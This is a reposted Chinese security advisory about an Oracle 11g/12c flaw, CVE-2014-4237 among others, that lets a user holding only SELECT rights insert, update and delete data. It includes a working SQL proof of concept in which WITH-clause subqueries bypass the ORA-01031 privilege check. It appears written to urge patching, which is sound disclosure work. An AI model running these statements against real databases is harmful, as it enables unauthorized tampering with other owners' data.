首页 > 数据库 > Oracle > 正文

【ORACLE】Oracle11g,12c 高危漏洞

2024-08-29 13:54:29
字体:
来源:转载
供稿:网友
【性质】高危漏洞【危害】仅有查询权限的用户可以对数据进行增、删、改操作【影响范围】广泛,包括11.2.0.3,11.2.0.4,12.1等版本(10g版本不包含)。【修复】2014年7月的CPU中被修正,强烈建议您检查所有Oracle数据库,确认是否存在该安全风险。与此有关的CVE号包括:CVE-2013-3751、CVE-2014-4236、CVE-2014-4237、CVE-2014-4245、CVE-2013-3774 .相关信息还可以参考Oracle的CPU页面:http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html【bug test】--100.95 Oracle Database 11g EnterPRise Edition Release 11.2.0.3.0 - 64bitSQL> conn ncv502/ncv502create user test identified by test;grant create session to test;create table t (ID number(4)); insert into t(ID) values(1); select * from t;grant select on t to test;SQL> conn test/testselect * from ncv502.t;update ncv502.t set id = 1 where id = 1; *第 1 行出现错误:ORA-01031: 权限不足--在WITH语句中,权限限制被完全绕过,增删改权限被获得SQL> update (with tmp as (select id from ncv502.t) select id from tmp) set id = 0 where id = 1;1 row updated.SQL> commit;Commit complete.SQL> delete (with temp as (select * from ncv502.t) select id from temp) where id = 0;1 row deleted.SQL> insert into (with temp as (select * from ncv502.t) select * from temp) select 2 from dual;1 row created.drop table t purge ;drop user test cascade;--71 Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit 没有该bug
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表